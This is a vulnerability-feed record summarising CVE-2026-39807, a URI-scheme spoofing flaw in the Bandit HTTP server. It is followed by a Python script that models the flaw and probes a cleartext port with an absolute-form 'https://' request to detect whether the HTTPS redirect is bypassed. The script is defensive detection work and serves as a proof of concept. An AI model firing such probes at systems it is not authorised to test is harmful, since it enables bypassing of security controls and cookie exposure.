{"uuid": "c63ec3e8-88a2-48a8-be30-755655cc458c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-39807", "type": "seen", "source": "https://gist.github.com/alon710/4ff6ed1a1dcb2ad425666d3faacd2bcb", "content": "# CVE-2026-39807: CVE-2026-39807: Transport-State Spoofing via Untrusted URI Scheme in Bandit HTTP Server\n\n&gt; **CVSS Score:** 6.3\n&gt; **Published:** 2026-05-07\n&gt; **Full Report:** https://cvereports.com/reports/CVE-2026-39807\n\n## Summary\nThe Bandit HTTP server prior to version 1.11.0 contains a transport-state spoofing vulnerability. The application incorrectly prioritizes the client-supplied URI scheme over the verified transport-layer encryption status. This allows unauthenticated attackers to spoof the connection state as secure (HTTPS) over a plaintext connection, bypassing security middleware and exposing secure cookies.\n\n## TL;DR\nA logic flaw in the Bandit HTTP server allows attackers to forge the connection scheme. 
Sending an absolute-form HTTP request over a plaintext connection causes the server to treat the request as HTTPS, bypassing SSL redirects and leaking secure cookies.\n\n## Exploit Status: POC\n\n## Technical Details\n\n- **CWE ID**: CWE-807\n- **Attack Vector**: Network\n- **CVSS Score**: 6.3\n- **EPSS Score**: 0.00018\n- **Impact**: Security feature bypass and confidentiality loss\n- **Exploit Status**: Proof of Concept\n- **KEV Status**: Not Listed\n\n## Affected Systems\n\n- Bandit HTTP Server for Elixir\n- Elixir applications utilizing Plug.Conn via Bandit\n- Deployments exposing plaintext (non-TLS) HTTP ports\n- **bandit**: &gt;= 1.0.0, &lt; 1.11.0 (Fixed in: `1.11.0`)\n\n## Mitigation\n\n- Upgrade the bandit package to a patched version\n- Disable plaintext network listeners and enforce TLS termination at the application\n- Deploy a reverse proxy to sanitize absolute-form HTTP request targets\n\n**Remediation Steps:**\n1. Update the project's mix.exs file to require bandit version 1.11.0 or later.\n2. Execute `mix deps.get` and `mix compile` to pull and build the updated dependency.\n3. Audit production deployments to verify whether plaintext ports are unintentionally exposed.\n4. Test downstream application behavior to ensure secure cookies and Plug.SSL correctly evaluate the patched state.\n\n## References\n\n- [GitHub Security Advisory GHSA-375f-4r2h-f99j](https://github.com/mtrudel/bandit/security/advisories/GHSA-375f-4r2h-f99j)\n- [EEF CNA Advisory for CVE-2026-39807](https://cna.erlef.org/cves/CVE-2026-39807.html)\n- [Bandit Fix Commit 45feea20](https://github.com/mtrudel/bandit/commit/45feea20dea8af7ffd7245271107b695c040e667)\n- [OSV Record EEF-CVE-2026-39807](https://osv.dev/vulnerability/EEF-CVE-2026-39807)\n\n\n---\n*Generated by [CVEReports](https://cvereports.com/reports/CVE-2026-39807) - Automated Vulnerability Intelligence*", "creation_timestamp": "2026-05-07T04:40:29.000000Z"}
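As an added example, not code from the record above, from Bandit, or from Plug: a Python model of the scheme-derivation flaw the TL;DR describes beside the corrected rule, plus a raw-socket probe that sends an origin-form control request and an absolute-form `https://` request over a cleartext port and compares the two responses. The host names, the `effective_scheme`, `classify` and `probe_server` functions, and the sample responses are assumptions constructed for illustration; the model is a simplification of the behaviour the advisory describes, not Bandit's source.

```python
import socket
from urllib.parse import urlsplit

# --- Part 1: model of the flaw (simplified illustration, NOT Bandit's code) ---

def effective_scheme(tls_transport: bool, request_target: str, *, trust_target_scheme: bool) -> str:
    """Scheme the application layer would observe for one request.

    tls_transport       -- whether the socket the request arrived on is TLS
    request_target      -- request-target from the request line: origin-form
                           ("/path") or absolute-form ("https://host/path")
    trust_target_scheme -- True models the flaw (client-supplied URI scheme
                           wins); False models the corrected rule (only the
                           transport decides).
    """
    transport_scheme = "https" if tls_transport else "http"
    if trust_target_scheme and "://" in request_target:
        # Security decision based on untrusted input (CWE-807).
        return urlsplit(request_target).scheme.lower() or transport_scheme
    return transport_scheme


# --- Part 2: black-box probe against a plaintext listener ---

def build_request(host: str, path: str = "/", *, absolute_form: bool) -> bytes:
    """Plaintext HTTP/1.1 GET; absolute_form=True claims https:// in the target."""
    target = f"https://{host}{path}" if absolute_form else path
    return (f"GET {target} HTTP/1.1\r\n"
            f"Host: {host}\r\n"
            f"Connection: close\r\n\r\n").encode("ascii")


def parse_response_head(raw: bytes) -> tuple[int, dict[str, str]]:
    """Status code and headers (names lower-cased) from a raw HTTP response."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    status_line, *header_lines = head.split("\r\n")
    status = int(status_line.split(" ", 2)[1])
    headers: dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers


def _redirected_to_https(resp: tuple[int, dict[str, str]]) -> bool:
    status, headers = resp
    return status in (301, 302, 307, 308) and headers.get("location", "").lower().startswith("https://")


def classify(control: tuple[int, dict[str, str]], probe: tuple[int, dict[str, str]]) -> str:
    """Compare the origin-form (control) and absolute-form (probe) responses.

    A plaintext port fronted by a Plug.SSL-style redirect should redirect both.
    If only the control is redirected, the scheme was taken from the target.
    """
    if not _redirected_to_https(control):
        return "inconclusive: plaintext port does not redirect a normal request to https"
    if _redirected_to_https(probe):
        return "not vulnerable: absolute-form https:// target was still redirected"
    return "likely vulnerable: absolute-form https:// target bypassed the https redirect"


def probe_server(host: str, port: int = 80, path: str = "/", timeout: float = 5.0) -> str:
    """Send control and probe over a cleartext socket and classify (does network I/O)."""
    def send(payload: bytes) -> bytes:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(payload)
            buf = b""
            while b"\r\n\r\n" not in buf:          # stop once the headers are complete
                chunk = s.recv(4096)
                if not chunk:
                    break
                buf += chunk
            return buf
    control = parse_response_head(send(build_request(host, path, absolute_form=False)))
    probe = parse_response_head(send(build_request(host, path, absolute_form=True)))
    return classify(control, probe)


# Constructed sample responses (not captured from any real server), for offline use.
SAMPLE_REDIRECT = (b"HTTP/1.1 301 Moved Permanently\r\n"
                   b"Location: https://app.example/\r\nContent-Length: 0\r\n\r\n")
SAMPLE_SERVED = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
                 b"Set-Cookie: _app_session=abc123; path=/; secure; HttpOnly\r\n"
                 b"Content-Length: 0\r\n\r\n")


def demo() -> dict[str, str]:
    """Flawed vs corrected scheme for the probe, and classification of both cases."""
    target = "https://app.example/login"
    return {
        "model_flawed": effective_scheme(False, target, trust_target_scheme=True),
        "model_fixed": effective_scheme(False, target, trust_target_scheme=False),
        "vulnerable": classify(parse_response_head(SAMPLE_REDIRECT), parse_response_head(SAMPLE_SERVED)),
        "patched": classify(parse_response_head(SAMPLE_REDIRECT), parse_response_head(SAMPLE_REDIRECT)),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run `probe_server(host, 80)` only against a deployment you are authorized to test. The check only has meaning when the plaintext port is fronted by an https redirect (Plug.SSL `force_ssl` or equivalent); with nothing to bypass the result is inconclusive, and the remaining way to verify is to log `conn.scheme` inside the application for an absolute-form request and confirm it reflects the transport rather than the URI.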